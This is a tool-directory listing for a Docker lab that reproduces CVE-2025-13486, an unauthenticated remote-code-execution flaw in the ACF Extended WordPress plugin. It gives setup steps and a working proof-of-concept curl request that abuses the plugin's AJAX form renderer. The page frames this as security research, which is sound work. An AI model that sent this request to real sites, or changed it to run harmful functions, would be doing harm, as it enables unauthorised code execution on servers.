Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-13486-vuln-setup — Docker test environment for CVE-2025-13486 (ACF Extended RCE). For security research only. | Kitploit
Tools/GitHubGitHub/kre80r/cve-2025-13486-vuln-setup
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubkre80r/cve-2025-13486-vuln-setup

cve-2025-13486-vuln-setup

Docker test environment for CVE-2025-13486 (ACF Extended RCE). For security research only.

View Repository
18 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-13486 Vulnerable Test Environment

One-shot Docker setup for testing ACF Extended RCE vulnerability.

Quick Start

root@kitploit:~
# 1. Download plugins (run once)
./download-plugins.sh

# 2. Start environment
docker-compose up -d --build

# 3. Wait ~30 seconds for setup, then test
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888

Manual Plugin Setup

If the download script fails, manually place these files in plugins/:

  1. ACF Pro (required dependency)

    • Download from: https://www.advancedcustomfields.com/pro/
    • Save as: plugins/acf-pro.zip
  2. ACF Extended 0.9.0.5 (vulnerable version)

    • Download from: https://downloads.wordpress.org/plugin/acf-extended.0.9.0.5.zip
    • Save as: plugins/acf-extended.zip

Testing the Exploit

root@kitploit:~
# Extract nonce from homepage
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'

# Test RCE with print_r
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
  -d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"

Cleanup

root@kitploit:~
docker-compose down -v

Vulnerability Details

  • CVE: CVE-2025-13486
  • Affected: ACF Extended 0.9.0.5 - 0.9.1.1
  • Type: Unauthenticated RCE via call_user_func_array()
  • CVSS: 9.8 (Critical)
Download Tool